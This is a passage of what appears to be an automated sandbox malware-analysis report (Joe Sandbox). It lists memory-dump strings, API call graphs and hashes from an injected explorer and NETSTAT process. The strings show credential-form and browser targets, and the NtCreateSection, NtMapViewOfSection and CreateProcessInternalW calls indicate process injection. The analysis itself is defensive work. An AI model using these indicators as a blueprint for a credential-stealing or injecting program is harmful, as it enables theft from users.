                                                                                                                                                                            • Instruction Fuzzy Hash: ABF0C230268A484FD788EF2CD89563AB3D0EBA8215F444A3FA58DC3364DA29C9814756
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                                                                                                            • API String ID: 0-393284711
                                                                                                                                                                            • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                                                            • Instruction ID: c99efee8e7001f5b97082da32b208b3a83b5910ad1283e0574d70b5b853e4f96
                                                                                                                                                                            • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                                                            • Instruction Fuzzy Hash: 36E19974618F488FCB68EF68D4847AAB7E0FB58300F504A6E959FC7252DF34A501DB89
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                                                                                                            • API String ID: 0-2916316912
                                                                                                                                                                            • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                                                            • Instruction ID: 1137253db52cd6abf9b8de0d0d942b670fcfc33074f63e1848a3de1d29eb51cb
                                                                                                                                                                            • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                                                            • Instruction Fuzzy Hash: 65B1A930618B488ECB59EF68D485AEEB7F1FF98300F50455ED49AC7252EF34A4158B82
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                                                                                                            • API String ID: 0-1539916866
                                                                                                                                                                            • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                                            • Instruction ID: 9d254e65840263e22f404dc64e965c9a62c5f562cbb8c803064eca7a2d2da1d9
                                                                                                                                                                            • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                                            • Instruction Fuzzy Hash: C141B370A18B08CFDB18DF88A4856BD7BF6FB48700F40025ED489D3246DB79AD458BD6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                                                                                            • API String ID: 0-355182820
                                                                                                                                                                            • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                                            • Instruction ID: ba017f109d5e5a7d3036bbebb90e89335aadd7e397d927c3dd06bb7744c7b348
                                                                                                                                                                            • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                                            • Instruction Fuzzy Hash: B8C18A74618B088BC758EF28E485AEAF3E1FB98304F40466E949EC7211DF34B555CB86
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                                                                                            • API String ID: 0-97273177
                                                                                                                                                                            • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                                            • Instruction ID: df8222f217a3b9b18d9a3a383d8b6bac0a6be5561258c2f7148dcf5bf50ccb0e
                                                                                                                                                                            • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                                            • Instruction Fuzzy Hash: 9151E7301187488FD719DF18D5812AAB7E5FB84704F501A6EF8CBC7242DBB4A546DF82
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: .dll$chro$hild$me_c
                                                                                                                                                                            • API String ID: 0-3136806129
                                                                                                                                                                            • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                                                            • Instruction ID: 72473f498366eb4390868adec89cefe2f7aa315280d9f71d0b819ddc273f988b
                                                                                                                                                                            • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                                                            • Instruction Fuzzy Hash: FF317270618B188FC784EF68A494BAAB7E1FFD4300F9446AD944ECB256DF34D505CB92
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                            • API String ID: 0-319646191
                                                                                                                                                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                            • Instruction ID: 08752fd0a9d8c35916b09fa40902e3d072e6886850b3045ed3377b614ca05184
                                                                                                                                                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                            • Instruction Fuzzy Hash: 5D31D131A14B0C8BCB05EFA8D8847EDB7E0FB58204F44026AD85ED7241DE789645CB89
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                            • API String ID: 0-319646191
                                                                                                                                                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                            • Instruction ID: 0df248dae59c8779e7e5101941407c70b4bc331f21dfde7556d1c6dd65c30c7e
                                                                                                                                                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                            • Instruction Fuzzy Hash: F121E430A14B0C8BCF05EFA8E8947EDBBE0FF58204F40426AD85AD7241DF789645CB89
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: .$l$l$t
                                                                                                                                                                            • API String ID: 0-168566397
                                                                                                                                                                            • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                                            • Instruction ID: 0c602eef9648be61a358ef9eae8818bb971ff907909e16f55a95cfcab38ed01c
                                                                                                                                                                            • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                                            • Instruction Fuzzy Hash: B4218B74A24B0D9FDB48EFA8E0447AEBAF0FF58304F50466ED409D3611DB78A5A5CB84
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: .$l$l$t
                                                                                                                                                                            • API String ID: 0-168566397
                                                                                                                                                                            • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                                            • Instruction ID: 6f7a1155d4c8b2e5ab6b92a83acde172ddff17e36140a6ada6c56c5b13747480
                                                                                                                                                                            • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                                            • Instruction Fuzzy Hash: BA218B74A24B0D9BDB08EFA8E0447EEBBF0FB18304F50466ED409D3601DB78A5658B84
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4143047548.000000000FA40000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FA40000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_fa40000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: auth$logi$pass$user
                                                                                                                                                                            • API String ID: 0-2393853802
                                                                                                                                                                            • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                                            • Instruction ID: 412921d95afb8746132d1935c2af04bd5bfb21f8581b30b72737e4433281d2a7
                                                                                                                                                                            • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                                            • Instruction Fuzzy Hash: A121C070A24B0D8BCB05DF9DA8807EEB7E1EF88344F004659D80ADB245D7B5E9248BD2

Execution Graph

Execution Coverage: 1.7%
Dynamic/Decrypted Code Coverage: 6.8%
Signature Coverage: 0%
Total number of Nodes: 620
Total number of Limit Nodes: 76
102954->102583 102957 52af20 LdrLoadDll 102956->102957 102958 51f1ab 102957->102958 102958->102586 102959 52a790 102958->102959 102960 52af20 LdrLoadDll 102959->102960 102961 52a7af LookupPrivilegeValueW 102960->102961 102961->102588 102964 52a23c 102963->102964 102965 52af20 LdrLoadDll 102963->102965 102969 3182ea0 LdrInitializeThunk 102964->102969 102965->102964 102966 52a25b 102966->102589 102968->102954 102969->102966 102971 51b1e0 102970->102971 102972 51b030 LdrLoadDll 102971->102972 102973 51b1f4 102972->102973 102973->102523 102975 51af24 102974->102975 103047 529c50 LdrLoadDll 102975->103047 102977 51af5e 102977->102525 102979 51f39c 102978->102979 102980 51b1b0 LdrLoadDll 102979->102980 102981 51f3ae 102980->102981 103048 51f280 102981->103048 102984 51f3e1 102988 52a450 2 API calls 102984->102988 102989 51f3f2 102984->102989 102985 51f3c9 102986 51f3d4 102985->102986 102987 52a450 2 API calls 102985->102987 102986->102529 102987->102986 102988->102989 102989->102529 102991 51f42c 102990->102991 103067 51b2a0 102991->103067 102993 51f43e 102994 51f280 3 API calls 102993->102994 102995 51f44f 102994->102995 102996 51f459 102995->102996 102997 51f471 102995->102997 102998 52a450 2 API calls 102996->102998 102999 51f464 102996->102999 103000 52a450 2 API calls 102997->103000 103001 51f482 102997->103001 102998->102999 102999->102531 103000->103001 103001->102531 103004 51ca88 103002->103004 103003 51ca95 103003->102540 103004->103003 103005 51af00 LdrLoadDll 103004->103005 103006 51cb3e 103005->103006 103007 51cb64 103006->103007 103008 51b030 LdrLoadDll 103006->103008 103007->102540 103009 51cb80 103008->103009 103010 524a40 8 API calls 103009->103010 103011 51cbd5 103010->103011 103011->102540 103013 51d636 103012->103013 103014 51b030 LdrLoadDll 103013->103014 103015 51d64a 103014->103015 103071 51d300 103015->103071 103017 51908b 103018 51cbf0 103017->103018 103019 51cc16 103018->103019 103020 51b030 LdrLoadDll 103019->103020 103021 51cc99 103019->103021 
103020->103021 103022 51b030 LdrLoadDll 103021->103022 103023 51cd06 103022->103023 103024 51af00 LdrLoadDll 103023->103024 103025 51cd6f 103024->103025 103026 51b030 LdrLoadDll 103025->103026 103027 51ce1f 103026->103027 103027->102553 103031 518d14 103028->103031 103101 51f6c0 103028->103101 103030 518f25 103030->102508 103031->103030 103106 524390 103031->103106 103033 518d70 103033->103030 103109 518ab0 103033->103109 103036 52cef0 2 API calls 103037 518db2 103036->103037 103038 52d020 3 API calls 103037->103038 103043 518dc7 103038->103043 103039 517ea0 4 API calls 103039->103043 103042 51c7a0 18 API calls 103042->103043 103043->103030 103043->103039 103043->103042 103044 518160 2 API calls 103043->103044 103114 51f660 103043->103114 103118 51f070 21 API calls 103043->103118 103044->103043 103045->102533 103046->102551 103047->102977 103049 51f29a 103048->103049 103050 51f350 103048->103050 103051 51b030 LdrLoadDll 103049->103051 103050->102984 103050->102985 103052 51f2bc 103051->103052 103058 529f00 103052->103058 103054 51f2fe 103061 529f40 103054->103061 103057 52a450 2 API calls 103057->103050 103059 529f1c 103058->103059 103060 52af20 LdrLoadDll 103058->103060 103059->103054 103060->103059 103062 52af20 LdrLoadDll 103061->103062 103063 529f5c 103062->103063 103066 31835c0 LdrInitializeThunk 103063->103066 103064 51f344 103064->103057 103066->103064 103068 51b2c7 103067->103068 103069 51b030 LdrLoadDll 103068->103069 103070 51b303 103069->103070 103070->102993 103072 51d317 103071->103072 103080 51f700 103072->103080 103077 51d392 103077->103017 103079 51d3a5 103079->103017 103081 51f725 103080->103081 103093 5181a0 103081->103093 103083 51f749 103084 51d35f 103083->103084 103085 524a40 8 API calls 103083->103085 103087 52bd80 2 API calls 103083->103087 103100 51f540 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 103083->103100 103088 52a6a0 103084->103088 103085->103083 103087->103083 103089 52a6bf CreateProcessInternalW 103088->103089 103090 
52af20 LdrLoadDll 103088->103090 103091 51d38b 103089->103091 103090->103089 103091->103077 103092 52a260 LdrLoadDll 103091->103092 103092->103079 103094 51829f 103093->103094 103095 5181b5 103093->103095 103094->103083 103095->103094 103096 524a40 8 API calls 103095->103096 103097 518222 103096->103097 103098 52bd80 2 API calls 103097->103098 103099 518249 103097->103099 103098->103099 103099->103083 103100->103083 103102 524e40 LdrLoadDll 103101->103102 103103 51f6df 103102->103103 103104 51f6e6 SetErrorMode 103103->103104 103105 51f6ed 103103->103105 103104->103105 103105->103031 103119 51f490 103106->103119 103108 5243b6 103108->103033 103110 52bd00 2 API calls 103109->103110 103113 518ad5 103110->103113 103111 518cea 103111->103036 103113->103111 103139 529840 103113->103139 103115 51f673 103114->103115 103187 529e50 103115->103187 103118->103043 103120 51f4ad 103119->103120 103126 529f80 103120->103126 103123 51f4f5 103123->103108 103127 52af20 LdrLoadDll 103126->103127 103128 529f9c 103127->103128 103137 3182f30 LdrInitializeThunk 103128->103137 103129 51f4ee 103129->103123 103131 529fd0 103129->103131 103132 529fe5 103131->103132 103133 52af20 LdrLoadDll 103132->103133 103134 529fec 103133->103134 103138 3182d10 LdrInitializeThunk 103134->103138 103135 51f51e 103135->103108 103137->103129 103138->103135 103140 52bf50 2 API calls 103139->103140 103141 529857 103140->103141 103160 519310 103141->103160 103143 529872 103144 5298b0 103143->103144 103145 529899 103143->103145 103148 52bd00 2 API calls 103144->103148 103146 52bd80 2 API calls 103145->103146 103147 5298a6 103146->103147 103147->103111 103149 5298ea 103148->103149 103150 52bd00 2 API calls 103149->103150 103152 529903 103150->103152 103157 529ba4 103152->103157 103166 52bd40 LdrLoadDll 103152->103166 103153 529b89 103154 529b90 103153->103154 103153->103157 103155 52bd80 2 API calls 103154->103155 103156 529b9a 103155->103156 103156->103111 103158 52bd80 2 API calls 103157->103158 103159 529bf9 
103158->103159 103159->103111 103161 519335 103160->103161 103162 51ace0 LdrLoadDll 103161->103162 103163 519368 103162->103163 103165 51938d 103163->103165 103167 51cf10 103163->103167 103165->103143 103166->103153 103168 51cf3c 103167->103168 103169 52a1a0 LdrLoadDll 103168->103169 103170 51cf55 103169->103170 103171 51cf5c 103170->103171 103178 52a1e0 103170->103178 103171->103165 103175 51cf97 103176 52a450 2 API calls 103175->103176 103177 51cfba 103176->103177 103177->103165 103179 52a1fc 103178->103179 103180 52af20 LdrLoadDll 103178->103180 103186 3182ca0 LdrInitializeThunk 103179->103186 103180->103179 103181 51cf7f 103181->103171 103183 52a7d0 103181->103183 103184 52af20 LdrLoadDll 103183->103184 103185 52a7ef 103184->103185 103185->103175 103186->103181 103188 52af20 LdrLoadDll 103187->103188 103189 529e6c 103188->103189 103192 3182dd0 LdrInitializeThunk 103189->103192 103190 51f69e 103190->103043 103192->103190

Control-flow Graph

APIs
• NtQueryInformationProcess.NTDLL ref: 02DBA19F
Strings
Memory Dump Source
• Source File: 00000005.00000002.4129812229.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2db0000_NETSTAT.jbxd
Similarity
• API ID: InformationProcessQuery
• String ID: 0
• API String ID: 1778838933-4108050209
• Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
• Instruction ID: b87ed52d66c1098bcdf943a194ed9145e1a536fdabbbb5d693a2df5956c53ff2
• Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
• Instruction Fuzzy Hash: 94F13F70918A8CCFDBA5EF68C894AEEB7E1FF98304F40462AD44AD7250DF349A41CB41

Control-flow Graph

control_flow_graph 207 2db9baf-2db9bef 208 2db9bf7-2db9bfe 207->208 209 2db9bf2 call 2db9102 207->209 210 2db9c0c-2db9c9a call 2dbb942 * 2 NtCreateSection 208->210 211 2db9c00 208->211 209->208 217 2db9d5a-2db9d68 210->217 218 2db9ca0-2db9d0a call 2dbb942 NtMapViewOfSection 210->218 212 2db9c02-2db9c0a 211->212 212->210 212->212 221 2db9d0c-2db9d4c 218->221 222 2db9d52 218->222 224 2db9d69-2db9d6b 221->224 225 2db9d4e-2db9d4f 221->225 222->217 226 2db9d88-2db9ddc call 2dbcd62 NtClose 224->226 227 2db9d6d-2db9d72 224->227 225->222 229 2db9d74-2db9d86 call 2db9172 227->229 229->226
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.4129812229.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2db0000_NETSTAT.jbxd
Similarity
• API ID: Section$CloseCreateView
• String ID: @$@
• API String ID: 1133238012-149943524
• Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
• Instruction ID: c3c5d5c19d4b46769244aa4bae67bbdd88ad20b567e074ccec36f6fe7d1c4f8a
• Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
• Instruction Fuzzy Hash: B1618170118B488FCB59DF58D8956EABBE0FF98314F50062EE58AC3251DB35D841CB86

Control-flow Graph

control_flow_graph 268 2db9bb2-2db9bfe call 2db9102 271 2db9c0c-2db9c9a call 2dbb942 * 2 NtCreateSection 268->271 272 2db9c00 268->272 278 2db9d5a-2db9d68 271->278 279 2db9ca0-2db9d0a call 2dbb942 NtMapViewOfSection 271->279 273 2db9c02-2db9c0a 272->273 273->271 273->273 282 2db9d0c-2db9d4c 279->282 283 2db9d52 279->283 285 2db9d69-2db9d6b 282->285 286 2db9d4e-2db9d4f 282->286 283->278 287 2db9d88-2db9ddc call 2dbcd62 NtClose 285->287 288 2db9d6d-2db9d72 285->288 286->283 290 2db9d74-2db9d86 call 2db9172 288->290 290->287
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.4129812229.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2db0000_NETSTAT.jbxd
Similarity
• API ID: Section$CreateView
• String ID: @$@
• API String ID: 1585966358-149943524
• Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
• Instruction ID: 99e979712881fa8a06f639151691372e02566f524262812395bd2658abb85e87
• Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
• Instruction Fuzzy Hash: 94517E70618B488FCB59DF18D8956AABBE0FF88314F50062EE98AC3651DF35D441CB86

Control-flow Graph

APIs
• NtQueryInformationProcess.NTDLL ref: 02DBA19F
Strings
Memory Dump Source
• Source File: 00000005.00000002.4129812229.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2db0000_NETSTAT.jbxd
Similarity
• API ID: InformationProcessQuery
• String ID: 0
• API String ID: 1778838933-4108050209
• Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
• Instruction ID: d18b71edbc8ba98632fdc904a516537ead805d1b10f9d2bde1c2eb992df15e4a
• Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
• Instruction Fuzzy Hash: F3512B70918A8C8FDB69EF68C8946EEB7F5FF98305F40462AD84AD7210DF349645CB41

Control-flow Graph

control_flow_graph 545 52a2da-52a2db 546 52a31e-52a371 call 52af20 NtCreateFile 545->546 547 52a2dd-52a319 call 52af20 545->547
APIs
• NtCreateFile.NTDLL(00000060,00000000,.z`,00524BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00524BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0052A36D
Strings
Memory Dump Source
• Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID: .z`
• API String ID: 823142352-1441809116
• Opcode ID: 980e77addbe127181fd9b4928a05b8f521c44176c3d0d8ef51820e773fe3be85
• Instruction ID: 88c73ef551b7b7c62f6a144056750808b7b2159ae09765d578392b7dcf9231d9
• Opcode Fuzzy Hash: 980e77addbe127181fd9b4928a05b8f521c44176c3d0d8ef51820e773fe3be85
• Instruction Fuzzy Hash: C811D3B2204209AFDB08DF88DC85EEB77A9AF8C754F158548BA1997241D630E811CBA0

Control-flow Graph

control_flow_graph 561 52a320-52a336 562 52a33c-52a371 NtCreateFile 561->562 563 52a337 call 52af20 561->563 563->562
APIs
• NtCreateFile.NTDLL(00000060,00000000,.z`,00524BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00524BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0052A36D
Strings
Memory Dump Source
• Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
Yara matches
Similarity
• API ID: CreateFile
                                                                                                                                                                            • String ID: .z`
                                                                                                                                                                            • API String ID: 823142352-1441809116
                                                                                                                                                                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                                            • Instruction ID: 808f23ed0322d27c9619c967136bed9226abbdb15b2725adc99670b582fb7017
                                                                                                                                                                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                                            • Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241D630E811CBA4

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 564 52a3d0-52a419 call 52af20 NtReadFile
                                                                                                                                                                            APIs
                                                                                                                                                                            • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!JR,FFFFFFFF,?,bMR,?,00000000), ref: 0052A415
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                            • String ID: !JR
                                                                                                                                                                            • API String ID: 2738559852-1228759698
                                                                                                                                                                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                                            • Instruction ID: c56b2ee5126e4084d9eed046d44861a51aeb357f66d49a7b08bea3654abaa679
                                                                                                                                                                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                                            • Instruction Fuzzy Hash: 47F0A4B6200208ABCB14DF89DC85EEB77ADAF8C754F158248BA1D97245D630E811CBA0
                                                                                                                                                                            APIs
                                                                                                                                                                            • NtClose.NTDLL(@MR,?,?,00524D40,00000000,FFFFFFFF), ref: 0052A475
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Close
                                                                                                                                                                            • String ID: @MR
                                                                                                                                                                            • API String ID: 3535843008-1332303170
                                                                                                                                                                            • Opcode ID: a8ee89969e478624c327e058f68819eb69bf11cadadd1e1f1049b79acb303f13
                                                                                                                                                                            • Instruction ID: 31d2183179dc914af15eb517875c0b226d066ccbb6be7862a3299c7d9949e97a
                                                                                                                                                                            • Opcode Fuzzy Hash: a8ee89969e478624c327e058f68819eb69bf11cadadd1e1f1049b79acb303f13
                                                                                                                                                                            • Instruction Fuzzy Hash: 99E0C2766401106BD720DBA4EC8AEEB7F28EF84310F1845A8FA4CDB242D534E610C7D0
                                                                                                                                                                            APIs
                                                                                                                                                                            • NtClose.NTDLL(@MR,?,?,00524D40,00000000,FFFFFFFF), ref: 0052A475
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Close
                                                                                                                                                                            • String ID: @MR
